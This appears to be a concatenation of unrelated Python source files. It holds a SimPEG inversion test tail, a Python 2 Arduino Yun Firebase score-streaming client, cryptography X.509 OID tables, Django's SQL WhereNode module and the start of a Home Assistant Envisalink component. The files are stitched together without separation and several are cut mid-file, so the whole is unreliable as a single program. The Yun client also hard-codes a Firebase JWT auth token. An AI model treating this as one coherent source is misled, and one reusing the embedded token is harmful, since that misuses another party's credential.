        reg_taui = regularization.Simple(mesh, mapping=wires.taui, indActive=~airind)
        reg_c = regularization.Simple(mesh, mapping=wires.c, indActive=~airind)
        reg = reg_eta + reg_taui + reg_c
        opt = optimization.InexactGaussNewton(
            maxIterLS=20, maxIter=10, tolF=1e-6, tolX=1e-6, tolG=1e-6, maxIterCG=6
        )
        invProb = inverse_problem.BaseInvProblem(dmis, reg, opt, beta=1e4)
        inv = inversion.BaseInversion(invProb)
        self.inv = inv
        self.reg = reg
        self.p = problem
        self.mesh = mesh
        self.m0 = mSynth
        self.survey = survey
        self.dmis = dmis
        self.dobs = dobs

    def test_misfit(self):
        passed = tests.checkDerivative(
            lambda m: [self.p.dpred(m), lambda mx: self.p.Jvec(self.m0, mx)],
            self.m0,
            plotIt=False,
            num=3,
        )
        self.assertTrue(passed)

    def test_adjoint(self):
        # Adjoint Test
        # Model size comes from the combined regularization mapping.
        v = np.random.rand(self.reg.mapping.nP)
        w = np.random.rand(self.survey.nD)
        wtJv = w.dot(self.p.Jvec(self.m0, v))
        vtJtw = v.dot(self.p.Jtvec(self.m0, w))
        passed = np.abs(wtJv - vtJtw) < 1e-8
        print("Adjoint Test", np.abs(wtJv - vtJtw), passed)
        self.assertTrue(passed)

    def test_dataObj(self):
        passed = tests.checkDerivative(
            lambda m: [self.dmis(m), self.dmis.deriv(m)], self.m0, plotIt=False, num=3
        )
        self.assertTrue(passed)


if __name__ == "__main__":
    unittest.main()
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# NOTE(review): this is Python 2 code (print statements, urllib2); formatting
# below is reconstructed from a whitespace-mangled source.
"""
The Yun's Atheros-side client to the firebase streaming API.

The script is responsible for streaming from:
1. The table's current game.
2. The current game's data (scores).
3. The Yun bridgeclient.

And sending to:
1. The Yun bridgeclient.

There are a few constraints here that prevent this from being a nice script.
Most importantly we have no space (flash or ram) for dependencies like requests
or an SSE client which depend on requests anyway. Still, it's nice to be
reminded of the early 2000s when Python was still fun.
"""
import json
import logging
import select
import socket
import sys
import time
import urllib2
import uuid

# Now try to load the bridge library which is installed in the following bizarre
# location on the Yun. If they had only thought to add "site-packages" to
# that path we wouldn't need this.
sys.path.insert(0, '/usr/lib/python2.7/bridge/')
try:
    from bridgeclient import BridgeClient
    bridge_available = True
except ImportError:
    # Use the fake bridge client - we are developing off the Yun.
    bridge_available = False

    class BridgeClient(object):
        """A fake fake."""


class FakeBridgeClient(object):
    """A bridge that can be run off a yun, for testing."""

    def begin(self):
        pass

    def mailbox(self, msg):
        # Fake "send": just echo what would go to the Arduino side.
        print 'SENDING', msg

    def mailbox_read(self, timeout=0):
        pass

    def socket_open(self):
        pass

    def close(self):
        pass


class CustomBridgeClient(BridgeClient):
    """Customized bridge client to add message receiving functionality.

    Another strange decision to omit mailbox_read from the bridge client, since
    the equivalent API to send messages on the Arduino side *is* implemented.
    """

    def mailbox_read(self, timeout=0):
        """Read a single mailbox message."""
        data = self.socket_open()
        r = self.wait_response(data, timeout)
        m = None
        if r is not None:
            try:
                m = r['data']
            # NOTE(review): bare except silently swallows any lookup failure.
            except:
                pass
        self.socket_close()
        return m


def create_bridge():
    """Creates the correct bridge if we are on or off the Yun."""
    if bridge_available:
        return CustomBridgeClient()
    else:
        return FakeBridgeClient()


# Module-level singleton used by Client for all Arduino communication.
bridge = create_bridge()

DATA_NAME = "https://functions-prerelease-11-bb35b.firebaseio.com"
# Firebase server-timestamp sentinel, POSTed when a button is hit.
DATA_POST = json.dumps({'.sv': 'timestamp'})
DATA_AUTH = ('?auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOj'
             'E0NjU2NjMwMDksInYiOjAsImQiOnsidWlkIjoiYmFuYW5hIn0sIml'
             'hdCI6MTQ2MzA3MTAwOX0.qEaQ0mSFd48a_NiUIX53OI6PuLKOOFRvJ'
             '9akcBMEKH4')
# Reconnect/refresh intervals, in seconds.
TABLE_INTERVAL = 60
CONFIG_INTERVAL = 10
GAME_INTERVAL = 30  # NOTE(review): defined but check_timers hard-codes 5.
LOG_FORMAT = '%(asctime)s:%(levelname)s:%(message)s'
DATE_FORMAT = '%a:%I:%M:%S'
logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT,
                    datefmt=DATE_FORMAT)


def log(msg):
    return logging.info(msg)


class Timer(object):
    """Simple wall-clock elapsed-time checker."""

    def __init__(self):
        self.reset()

    def reset(self):
        self.start = time.time()

    def past(self, seconds):
        # True once more than 'seconds' have elapsed since reset().
        return (time.time() - self.start) > seconds


class Client(object):
    """Streams game state from Firebase and relays it over the Yun bridge."""

    def __init__(self):
        ##### emulating another board
        self.board_id = 'B4218AF83536'
        log('my real mac>%s' % self.get_mac())
        self.board_id = self.get_mac()
        self.game_id = None
        self.score = [0, 0]
        self.table_conn = None
        self.game_conn = None
        self.table_timer = None
        self.game_timer = None
        self.config_timer = None
        self.can_loop = True

    def start(self):
        """Starts the table and blocks."""
        self.send_config()
        self.config_timer = Timer()
        self.listen_table()
        self.loop()

    def loop(self):
        """Main loop."""
        while self.can_loop:
            # NOTE(review): table_conn is only None before the first
            # listen_table(); stop_listen_table never resets it - confirm.
            if self.table_conn is None:
                self.listen_table()
            self.check_timers()
            self.receive_bridge()
            self.receive_http()
            time.sleep(0.1)

    def open_stream(self, url):
        """Opens a Firebase url as an event stream."""
        req = urllib2.Request(url)
        req.add_header('Accept', 'text/event-stream')
        opener = urllib2.build_opener()
        try:
            resp = opener.open(req, timeout=3)
        except urllib2.URLError:
            # Returns None implicitly; callers re-try via timers.
            return
        # Unbuffered. Undocumented superfix.
        resp.fp._rbufsize = -1
        return resp

    def listen_table(self):
        """Listen to the current table stream for new games."""
        self.stop_listen_table()
        url = '%s/tables/%s/current_game.json%s' % (
            DATA_NAME, self.board_id, DATA_AUTH)
        self.table_conn = self.open_stream(url)
        self.table_timer = Timer()

    def listen_game(self):
        """Listen to the current game."""
        self.stop_listen_game()
        url = '%s%s.json%s' % (DATA_NAME, self.game_id, DATA_AUTH)
        self.game_conn = self.open_stream(url)
        self.game_timer = Timer()

    def stop_listen_table(self):
        if self.table_conn is not None:
            self.table_conn.close()

    def stop_listen_game(self):
        if self.game_conn is not None:
            self.game_conn.close()

    def start_bridge(self):
        """Start the bridge, and return it."""
        try:
            bridge.begin()
            return True
        except socket.error:
            return False

    def check_timers(self):
        """Check the timers, and if so restart ourselves."""
        if self.table_timer.past(TABLE_INTERVAL):
            self.listen_table()
        if self.game_timer is not None and self.game_timer.past(5):
            self.listen_game()
        if self.config_timer.past(CONFIG_INTERVAL):
            self.send_config()
            self.config_timer = Timer()

    def receive_bridge(self):
        """Reads from the bridge, and dispatches accordingly"""
        if not self.start_bridge():
            return
        msg = bridge.mailbox_read();
        if msg:
            print msg
            self.send_button(msg.strip())

    def receive_http(self):
        """Reads from the available http sockets, and dispatches accordingly."""
        sel = []
        if self.game_conn is not None:
            sel.append(self.game_conn)
        if self.table_conn is not None:
            sel.append(self.table_conn)
        se = select.select(sel, [], sel, 0.1)
        ss = se[0]
        for resp in ss:
            # SSE frames: an "event: put" line followed by a "data: ..." line,
            # possibly preceded by a blank keep-alive line.
            first = resp.readline().strip()
            if first == '':
                first = resp.readline().strip()
            second = resp.readline().strip()
            if first != "event: put":
                continue
            # Strip the leading "data: " prefix (6 chars) before parsing.
            data = json.loads(second[6:])
            if resp is self.table_conn:
                self.game_received(data)
            elif resp is self.game_conn:
                self.score_received(data)

    def send_button(self, button_name):
        """Send a named button to Firebase after attaching the board ID."""
        button_id = '%s-%s' % (button_name, self.board_id)
        url = '%s/switches/%s/hits.json%s' % (DATA_NAME, button_id, DATA_AUTH)
        log('sending button>%s' % url)
        req = urllib2.Request(url, DATA_POST,
                              {'Content-Type': 'application/json'})
        resp = urllib2.urlopen(req)
        content = resp.read()
        log('sending button<%s' % content)
        resp.close()

    def game_received(self, m):
        """Receives a message over the current table stream."""
        game = m['data']
        if game != self.game_id:
            self.game_id = game
            self.listen_game()

    def score_received(self, m):
        """Receives a score ove the current game stream."""
        path = m['path']
        data = m['data']
        if path == "/":
            # Full-object update: take whichever scores are present.
            self.score[0] = data.get('team_1_score', self.score[0])
            self.score[1] = data.get('team_2_score', self.score[1])
        elif path == "/team_1_score":
            self.score[0] = data
        elif path == "/team_2_score":
            self.score[1] = data
        self.send_score()

    def send_score(self):
        """Sends the score to the Arduino over the mailbox."""
        score = 'sco:%s %s' % tuple(self.score)
        if not self.start_bridge():
            return
        bridge.mailbox(score)

    def send_config(self):
        """Sends the config to the Arduino over the mailbox."""
        mac = 'mac:%s' % self.board_id
        eip = 'eip:%s' % self.get_ip()
        if not self.start_bridge():
            return
        bridge.mailbox(mac)
        bridge.mailbox(eip)

    def get_mac(self):
        return '%012X' % uuid.getnode()

    def get_ip(self):
        # UDP-connect trick: no packets are sent, but the kernel picks the
        # outgoing interface, whose address we then read back.
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
            s.connect(('<broadcast>', 0))
            return s.getsockname()[0]
        except socket.error:
            return 'no idea'


if __name__ == '__main__':
    c = Client()
    c.start()
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.

# X.509 object identifier (OID) definitions and name tables.
# NOTE(review): formatting reconstructed from a whitespace-mangled source.
from __future__ import absolute_import, division, print_function

from cryptography import utils
from cryptography.hazmat.primitives import hashes


class ObjectIdentifier(object):
    """An ASN.1 object identifier, validated from its dotted-string form."""

    def __init__(self, dotted_string):
        self._dotted_string = dotted_string
        nodes = self._dotted_string.split(".")
        intnodes = []
        # There must be at least 2 nodes, the first node must be 0..2, and
        # if less than 2, the second node cannot have a value outside the
        # range 0..39. All nodes must be integers.
        for node in nodes:
            try:
                # base 0: accepts plain decimal (and prefixed forms like 0x).
                intnodes.append(int(node, 0))
            except ValueError:
                raise ValueError(
                    "Malformed OID: %s (non-integer nodes)" % (
                        self._dotted_string))
        if len(nodes) < 2:
            raise ValueError(
                "Malformed OID: %s (insufficient number of nodes)" % (
                    self._dotted_string))
        if intnodes[0] > 2:
            raise ValueError(
                "Malformed OID: %s (first node outside valid range)" % (
                    self._dotted_string))
        if intnodes[0] < 2 and intnodes[1] >= 40:
            raise ValueError(
                "Malformed OID: %s (second node outside valid range)" % (
                    self._dotted_string))

    def __eq__(self, other):
        if not isinstance(other, ObjectIdentifier):
            return NotImplemented
        return self.dotted_string == other.dotted_string

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<ObjectIdentifier(oid={0}, name={1})>".format(
            self.dotted_string,
            self._name
        )

    def __hash__(self):
        # Hash matches __eq__: both key off the dotted string.
        return hash(self.dotted_string)

    @property
    def _name(self):
        # Friendly name looked up from the module-level table below.
        return _OID_NAMES.get(self, "Unknown OID")

    dotted_string = utils.read_only_property("_dotted_string")


class ExtensionOID(object):
    """OIDs for X.509 certificate extensions."""
    SUBJECT_DIRECTORY_ATTRIBUTES = ObjectIdentifier("2.5.29.9")
    SUBJECT_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.14")
    KEY_USAGE = ObjectIdentifier("2.5.29.15")
    SUBJECT_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.17")
    ISSUER_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.18")
    BASIC_CONSTRAINTS = ObjectIdentifier("2.5.29.19")
    NAME_CONSTRAINTS = ObjectIdentifier("2.5.29.30")
    CRL_DISTRIBUTION_POINTS = ObjectIdentifier("2.5.29.31")
    CERTIFICATE_POLICIES = ObjectIdentifier("2.5.29.32")
    POLICY_MAPPINGS = ObjectIdentifier("2.5.29.33")
    AUTHORITY_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.35")
    POLICY_CONSTRAINTS = ObjectIdentifier("2.5.29.36")
    EXTENDED_KEY_USAGE = ObjectIdentifier("2.5.29.37")
    FRESHEST_CRL = ObjectIdentifier("2.5.29.46")
    INHIBIT_ANY_POLICY = ObjectIdentifier("2.5.29.54")
    AUTHORITY_INFORMATION_ACCESS = ObjectIdentifier("1.3.6.1.5.5.7.1.1")
    SUBJECT_INFORMATION_ACCESS = ObjectIdentifier("1.3.6.1.5.5.7.1.11")
    OCSP_NO_CHECK = ObjectIdentifier("1.3.6.1.5.5.7.48.1.5")
    CRL_NUMBER = ObjectIdentifier("2.5.29.20")


class CRLEntryExtensionOID(object):
    """OIDs for per-entry CRL extensions."""
    CERTIFICATE_ISSUER = ObjectIdentifier("2.5.29.29")
    CRL_REASON = ObjectIdentifier("2.5.29.21")
    INVALIDITY_DATE = ObjectIdentifier("2.5.29.24")


class NameOID(object):
    """OIDs for distinguished-name (RDN) attribute types."""
    COMMON_NAME = ObjectIdentifier("2.5.4.3")
    COUNTRY_NAME = ObjectIdentifier("2.5.4.6")
    LOCALITY_NAME = ObjectIdentifier("2.5.4.7")
    STATE_OR_PROVINCE_NAME = ObjectIdentifier("2.5.4.8")
    ORGANIZATION_NAME = ObjectIdentifier("2.5.4.10")
    ORGANIZATIONAL_UNIT_NAME = ObjectIdentifier("2.5.4.11")
    SERIAL_NUMBER = ObjectIdentifier("2.5.4.5")
    SURNAME = ObjectIdentifier("2.5.4.4")
    GIVEN_NAME = ObjectIdentifier("2.5.4.42")
    TITLE = ObjectIdentifier("2.5.4.12")
    GENERATION_QUALIFIER = ObjectIdentifier("2.5.4.44")
    DN_QUALIFIER = ObjectIdentifier("2.5.4.46")
    PSEUDONYM = ObjectIdentifier("2.5.4.65")
    DOMAIN_COMPONENT = ObjectIdentifier("0.9.2342.19200300.100.1.25")
    EMAIL_ADDRESS = ObjectIdentifier("1.2.840.113549.1.9.1")
    JURISDICTION_COUNTRY_NAME = ObjectIdentifier("1.3.6.1.4.1.311.60.2.1.3")
    JURISDICTION_LOCALITY_NAME = ObjectIdentifier("1.3.6.1.4.1.311.60.2.1.1")
    JURISDICTION_STATE_OR_PROVINCE_NAME = ObjectIdentifier(
        "1.3.6.1.4.1.311.60.2.1.2"
    )
    BUSINESS_CATEGORY = ObjectIdentifier("2.5.4.15")


class SignatureAlgorithmOID(object):
    """OIDs for certificate signature algorithms."""
    RSA_WITH_MD5 = ObjectIdentifier("1.2.840.113549.1.1.4")
    RSA_WITH_SHA1 = ObjectIdentifier("1.2.840.113549.1.1.5")
    RSA_WITH_SHA224 = ObjectIdentifier("1.2.840.113549.1.1.14")
    RSA_WITH_SHA256 = ObjectIdentifier("1.2.840.113549.1.1.11")
    RSA_WITH_SHA384 = ObjectIdentifier("1.2.840.113549.1.1.12")
    RSA_WITH_SHA512 = ObjectIdentifier("1.2.840.113549.1.1.13")
    ECDSA_WITH_SHA1 = ObjectIdentifier("1.2.840.10045.4.1")
    ECDSA_WITH_SHA224 = ObjectIdentifier("1.2.840.10045.4.3.1")
    ECDSA_WITH_SHA256 = ObjectIdentifier("1.2.840.10045.4.3.2")
    ECDSA_WITH_SHA384 = ObjectIdentifier("1.2.840.10045.4.3.3")
    ECDSA_WITH_SHA512 = ObjectIdentifier("1.2.840.10045.4.3.4")
    DSA_WITH_SHA1 = ObjectIdentifier("1.2.840.10040.4.3")
    DSA_WITH_SHA224 = ObjectIdentifier("2.16.840.1.101.3.4.3.1")
    DSA_WITH_SHA256 = ObjectIdentifier("2.16.840.1.101.3.4.3.2")


# Maps signature-algorithm OID (dotted string) to its hash primitive.
_SIG_OIDS_TO_HASH = {
    SignatureAlgorithmOID.RSA_WITH_MD5.dotted_string: hashes.MD5(),
    SignatureAlgorithmOID.RSA_WITH_SHA1.dotted_string: hashes.SHA1(),
    SignatureAlgorithmOID.RSA_WITH_SHA224.dotted_string: hashes.SHA224(),
    SignatureAlgorithmOID.RSA_WITH_SHA256.dotted_string: hashes.SHA256(),
    SignatureAlgorithmOID.RSA_WITH_SHA384.dotted_string: hashes.SHA384(),
    SignatureAlgorithmOID.RSA_WITH_SHA512.dotted_string: hashes.SHA512(),
    SignatureAlgorithmOID.ECDSA_WITH_SHA1.dotted_string: hashes.SHA1(),
    SignatureAlgorithmOID.ECDSA_WITH_SHA224.dotted_string: hashes.SHA224(),
    SignatureAlgorithmOID.ECDSA_WITH_SHA256.dotted_string: hashes.SHA256(),
    SignatureAlgorithmOID.ECDSA_WITH_SHA384.dotted_string: hashes.SHA384(),
    SignatureAlgorithmOID.ECDSA_WITH_SHA512.dotted_string: hashes.SHA512(),
    SignatureAlgorithmOID.DSA_WITH_SHA1.dotted_string: hashes.SHA1(),
    SignatureAlgorithmOID.DSA_WITH_SHA224.dotted_string: hashes.SHA224(),
    SignatureAlgorithmOID.DSA_WITH_SHA256.dotted_string: hashes.SHA256()
}


class ExtendedKeyUsageOID(object):
    """OIDs for extended key usage purposes."""
    SERVER_AUTH = ObjectIdentifier("1.3.6.1.5.5.7.3.1")
    CLIENT_AUTH = ObjectIdentifier("1.3.6.1.5.5.7.3.2")
    CODE_SIGNING = ObjectIdentifier("1.3.6.1.5.5.7.3.3")
    EMAIL_PROTECTION = ObjectIdentifier("1.3.6.1.5.5.7.3.4")
    TIME_STAMPING = ObjectIdentifier("1.3.6.1.5.5.7.3.8")
    OCSP_SIGNING = ObjectIdentifier("1.3.6.1.5.5.7.3.9")


class AuthorityInformationAccessOID(object):
    """OIDs for authority-information-access methods."""
    CA_ISSUERS = ObjectIdentifier("1.3.6.1.5.5.7.48.2")
    OCSP = ObjectIdentifier("1.3.6.1.5.5.7.48.1")


class CertificatePoliciesOID(object):
    """OIDs for certificate-policy qualifiers."""
    CPS_QUALIFIER = ObjectIdentifier("1.3.6.1.5.5.7.2.1")
    CPS_USER_NOTICE = ObjectIdentifier("1.3.6.1.5.5.7.2.2")
    ANY_POLICY = ObjectIdentifier("2.5.29.32.0")


# Friendly names used by ObjectIdentifier._name / __repr__.
_OID_NAMES = {
    NameOID.COMMON_NAME: "commonName",
    NameOID.COUNTRY_NAME: "countryName",
    NameOID.LOCALITY_NAME: "localityName",
    NameOID.STATE_OR_PROVINCE_NAME: "stateOrProvinceName",
    NameOID.ORGANIZATION_NAME: "organizationName",
    NameOID.ORGANIZATIONAL_UNIT_NAME: "organizationalUnitName",
    NameOID.SERIAL_NUMBER: "serialNumber",
    NameOID.SURNAME: "surname",
    NameOID.GIVEN_NAME: "givenName",
    NameOID.TITLE: "title",
    NameOID.GENERATION_QUALIFIER: "generationQualifier",
    NameOID.DN_QUALIFIER: "dnQualifier",
    NameOID.PSEUDONYM: "pseudonym",
    NameOID.DOMAIN_COMPONENT: "domainComponent",
    NameOID.EMAIL_ADDRESS: "emailAddress",
    NameOID.JURISDICTION_COUNTRY_NAME: "jurisdictionCountryName",
    NameOID.JURISDICTION_LOCALITY_NAME: "jurisdictionLocalityName",
    NameOID.JURISDICTION_STATE_OR_PROVINCE_NAME: (
        "jurisdictionStateOrProvinceName"
    ),
    NameOID.BUSINESS_CATEGORY: "businessCategory",
    SignatureAlgorithmOID.RSA_WITH_MD5: "md5WithRSAEncryption",
    SignatureAlgorithmOID.RSA_WITH_SHA1: "sha1WithRSAEncryption",
    SignatureAlgorithmOID.RSA_WITH_SHA224: "sha224WithRSAEncryption",
    SignatureAlgorithmOID.RSA_WITH_SHA256: "sha256WithRSAEncryption",
    SignatureAlgorithmOID.RSA_WITH_SHA384: "sha384WithRSAEncryption",
    SignatureAlgorithmOID.RSA_WITH_SHA512: "sha512WithRSAEncryption",
    SignatureAlgorithmOID.ECDSA_WITH_SHA1: "ecdsa-with-SHA1",
    SignatureAlgorithmOID.ECDSA_WITH_SHA224: "ecdsa-with-SHA224",
    SignatureAlgorithmOID.ECDSA_WITH_SHA256: "ecdsa-with-SHA256",
    SignatureAlgorithmOID.ECDSA_WITH_SHA384: "ecdsa-with-SHA384",
    SignatureAlgorithmOID.ECDSA_WITH_SHA512: "ecdsa-with-SHA512",
    SignatureAlgorithmOID.DSA_WITH_SHA1: "dsa-with-sha1",
    SignatureAlgorithmOID.DSA_WITH_SHA224: "dsa-with-sha224",
    SignatureAlgorithmOID.DSA_WITH_SHA256: "dsa-with-sha256",
    ExtendedKeyUsageOID.SERVER_AUTH: "serverAuth",
    ExtendedKeyUsageOID.CLIENT_AUTH: "clientAuth",
    ExtendedKeyUsageOID.CODE_SIGNING: "codeSigning",
    ExtendedKeyUsageOID.EMAIL_PROTECTION: "emailProtection",
    ExtendedKeyUsageOID.TIME_STAMPING: "timeStamping",
    ExtendedKeyUsageOID.OCSP_SIGNING: "OCSPSigning",
    ExtensionOID.SUBJECT_DIRECTORY_ATTRIBUTES: "subjectDirectoryAttributes",
    ExtensionOID.SUBJECT_KEY_IDENTIFIER: "subjectKeyIdentifier",
    ExtensionOID.KEY_USAGE: "keyUsage",
    ExtensionOID.SUBJECT_ALTERNATIVE_NAME: "subjectAltName",
    ExtensionOID.ISSUER_ALTERNATIVE_NAME: "issuerAltName",
    ExtensionOID.BASIC_CONSTRAINTS: "basicConstraints",
    CRLEntryExtensionOID.CRL_REASON: "cRLReason",
    CRLEntryExtensionOID.INVALIDITY_DATE: "invalidityDate",
    CRLEntryExtensionOID.CERTIFICATE_ISSUER: "certificateIssuer",
    ExtensionOID.NAME_CONSTRAINTS: "nameConstraints",
    ExtensionOID.CRL_DISTRIBUTION_POINTS: "cRLDistributionPoints",
    ExtensionOID.CERTIFICATE_POLICIES: "certificatePolicies",
    ExtensionOID.POLICY_MAPPINGS: "policyMappings",
    ExtensionOID.AUTHORITY_KEY_IDENTIFIER: "authorityKeyIdentifier",
    ExtensionOID.POLICY_CONSTRAINTS: "policyConstraints",
    ExtensionOID.EXTENDED_KEY_USAGE: "extendedKeyUsage",
    ExtensionOID.FRESHEST_CRL: "freshestCRL",
    ExtensionOID.INHIBIT_ANY_POLICY: "inhibitAnyPolicy",
    ExtensionOID.AUTHORITY_INFORMATION_ACCESS: "authorityInfoAccess",
    ExtensionOID.SUBJECT_INFORMATION_ACCESS: "subjectInfoAccess",
    ExtensionOID.OCSP_NO_CHECK: "OCSPNoCheck",
    ExtensionOID.CRL_NUMBER: "cRLNumber",
    AuthorityInformationAccessOID.OCSP: "OCSP",
    AuthorityInformationAccessOID.CA_ISSUERS: "caIssuers",
    CertificatePoliciesOID.CPS_QUALIFIER: "id-qt-cps",
    CertificatePoliciesOID.CPS_USER_NOTICE: "id-qt-unotice",
}
"""
Code to manage the creation and SQL rendering of 'where' constraints.
"""
from django.core.exceptions import EmptyResultSet
from django.utils import tree
from django.utils.functional import cached_property

# Connection types
AND = 'AND'
OR = 'OR'


class WhereNode(tree.Node):
    """
    An SQL WHERE clause.

    The class is tied to the Query class that created it (in order to
    create the correct SQL).

    A child is usually an expression producing boolean values. Most likely the
    expression is a Lookup instance.

    However, a child could also be any class with as_sql() and either
    relabeled_clone() method or relabel_aliases() and clone() methods and
    contains_aggregate attribute.
    """
    # Children are combined with AND unless the tree was built otherwise.
    default = AND

    def split_having(self, negated=False):
        """
        Return two possibly None nodes: one for those parts of self that
        should be included in the WHERE clause and one for those parts of
        self that must be included in the HAVING clause.
        """
        # Nothing aggregate anywhere below: the whole node belongs in WHERE.
        if not self.contains_aggregate:
            return self, None
        in_negated = negated ^ self.negated
        # If the effective connector is OR and this node contains an aggregate,
        # then we need to push the whole branch to HAVING clause.
        may_need_split = (
            (in_negated and self.connector == AND) or
            (not in_negated and self.connector == OR))
        if may_need_split and self.contains_aggregate:
            return None, self
        # Otherwise split child-by-child, recursing into sub-nodes.
        where_parts = []
        having_parts = []
        for c in self.children:
            if hasattr(c, 'split_having'):
                where_part, having_part = c.split_having(in_negated)
                if where_part is not None:
                    where_parts.append(where_part)
                if having_part is not None:
                    having_parts.append(having_part)
            elif c.contains_aggregate:
                having_parts.append(c)
            else:
                where_parts.append(c)
        # Rebuild nodes with the same connector/negation; None if a side is empty.
        having_node = self.__class__(having_parts, self.connector, self.negated) if having_parts else None
        where_node = self.__class__(where_parts, self.connector, self.negated) if where_parts else None
        return where_node, having_node

    def as_sql(self, compiler, connection):
        """
        Return the SQL version of the where clause and the value to be
        substituted in. Return '', [] if this node matches everything,
        None, [] if this node is empty, and raise EmptyResultSet if this
        node can't match anything.
        """
        result = []
        result_params = []
        # For AND, a single empty child empties the node; for OR, a single
        # full child fills it. Track how many of each we still need.
        if self.connector == AND:
            full_needed, empty_needed = len(self.children), 1
        else:
            full_needed, empty_needed = 1, len(self.children)

        for child in self.children:
            try:
                sql, params = compiler.compile(child)
            except EmptyResultSet:
                empty_needed -= 1
            else:
                if sql:
                    result.append(sql)
                    result_params.extend(params)
                else:
                    # Empty SQL means the child matches everything.
                    full_needed -= 1
            # Check if this node matches nothing or everything.
            # First check the amount of full nodes and empty nodes
            # to make this node empty/full.
            # Now, check if this node is full/empty using the
            # counts.
            if empty_needed == 0:
                if self.negated:
                    return '', []
                else:
                    raise EmptyResultSet
            if full_needed == 0:
                if self.negated:
                    raise EmptyResultSet
                else:
                    return '', []
        conn = ' %s ' % self.connector
        sql_string = conn.join(result)
        if sql_string:
            if self.negated:
                # Some backends (Oracle at least) need parentheses
                # around the inner SQL in the negated case, even if the
                # inner SQL contains just a single expression.
                sql_string = 'NOT (%s)' % sql_string
            elif len(result) > 1:
                # Parenthesize multi-term clauses so the connector binds
                # correctly when this node is embedded in a larger clause.
                sql_string = '(%s)' % sql_string
        return sql_string, result_params

    def get_group_by_cols(self):
        """Collect GROUP BY columns from all children."""
        cols = []
        for child in self.children:
            cols.extend(child.get_group_by_cols())
        return cols

    def get_source_expressions(self):
        # Return a shallow copy so callers can't mutate our child list.
        return self.children[:]

    def set_source_expressions(self, children):
        assert len(children) == len(self.children)
        self.children = children

    def relabel_aliases(self, change_map):
        """
        Relabel the alias values of any children. 'change_map' is a dictionary
        mapping old (current) alias values to the new values.
        """
        for pos, child in enumerate(self.children):
            if hasattr(child, 'relabel_aliases'):
                # For example another WhereNode
                child.relabel_aliases(change_map)
            elif hasattr(child, 'relabeled_clone'):
                self.children[pos] = child.relabeled_clone(change_map)

    def clone(self):
        """
        Create a clone of the tree. Must only be called on root nodes (nodes
        with empty subtree_parents). Children must be either
        (Constraint, lookup, value) tuples, or objects supporting .clone().
        """
        clone = self.__class__._new_instance(
            children=[], connector=self.connector, negated=self.negated)
        for child in self.children:
            if hasattr(child, 'clone'):
                clone.children.append(child.clone())
            else:
                # Child without clone(); share the reference.
                clone.children.append(child)
        return clone

    def relabeled_clone(self, change_map):
        """Return a clone of self with aliases relabeled via change_map."""
        clone = self.clone()
        clone.relabel_aliases(change_map)
        return clone

    @classmethod
    def _contains_aggregate(cls, obj):
        # Recursive helper: True if obj or any descendant has an aggregate.
        if isinstance(obj, tree.Node):
            return any(cls._contains_aggregate(c) for c in obj.children)
        return obj.contains_aggregate

    @cached_property
    def contains_aggregate(self):
        # Cached: the tree isn't expected to change after this is first read.
        return self._contains_aggregate(self)

    @classmethod
    def _contains_over_clause(cls, obj):
        # Recursive helper: True if obj or any descendant has a window clause.
        if isinstance(obj, tree.Node):
            return any(cls._contains_over_clause(c) for c in obj.children)
        return obj.contains_over_clause

    @cached_property
    def contains_over_clause(self):
        # Cached: the tree isn't expected to change after this is first read.
        return self._contains_over_clause(self)

    @property
    def is_summary(self):
        return any(child.is_summary for child in self.children)


class NothingNode:
    """A node that matches nothing."""
    contains_aggregate = False

    def as_sql(self, compiler=None, connection=None):
        raise EmptyResultSet


class ExtraWhere:
    """Raw SQL snippets supplied via QuerySet.extra(where=...)."""
    # The contents are a black box - assume no aggregates are used.
    contains_aggregate = False

    def __init__(self, sqls, params):
        self.sqls = sqls
        self.params = params

    def as_sql(self, compiler=None, connection=None):
        # Each raw snippet is parenthesized and the pieces are ANDed together.
        sqls = ["(%s)" % sql for sql in self.sqls]
        return " AND ".join(sqls), list(self.params or ())


class SubqueryConstraint:
    """Constrain columns against the result of a subquery."""
    # Even if aggregates would be used in a subquery, the outer query isn't
    # interested about those.
    contains_aggregate = False

    def __init__(self, alias, columns, targets, query_object):
        self.alias = alias
        self.columns = columns
        self.targets = targets
        self.query_object = query_object

    def as_sql(self, compiler, connection):
        query = self.query_object
        query.set_values(self.targets)
        query_compiler = query.get_compiler(connection=connection)
        return query_compiler.as_subquery_condition(self.alias, self.columns, compiler)
"""
Support for Envisalink devices.

For more details about this component, please refer to the documentation at
https://home-assistant.io/components/envisalink/
"""
import asyncio
import logging

import voluptuous as vol

from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from homeassistant.const import EVENT_HOMEASSISTANT_STOP, CONF_TIMEOUT
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.discovery import async_load_platform
from homeassistant.helpers.dispatcher import async_dispatcher_send

REQUIREMENTS = ['pyenvisalink==3.8']

_LOGGER = logging.getLogger(__name__)

DOMAIN = 'envisalink'

# Key under which the panel controller is stored in hass.data.
DATA_EVL = 'envisalink'

# Configuration keys.
CONF_CODE = 'code'
CONF_EVL_HOST = 'host'
CONF_EVL_KEEPALIVE = 'keepalive_interval'
CONF_EVL_PORT = 'port'
CONF_EVL_VERSION = 'evl_version'
CONF_PANEL_TYPE = 'panel_type'
CONF_PANIC = 'panic_type'
CONF_PARTITIONNAME = 'name'
CONF_PARTITIONS = 'partitions'
CONF_PASS = 'password'
CONF_USERNAME = 'user_name'
CONF_ZONEDUMP_INTERVAL = 'zonedump_interval'
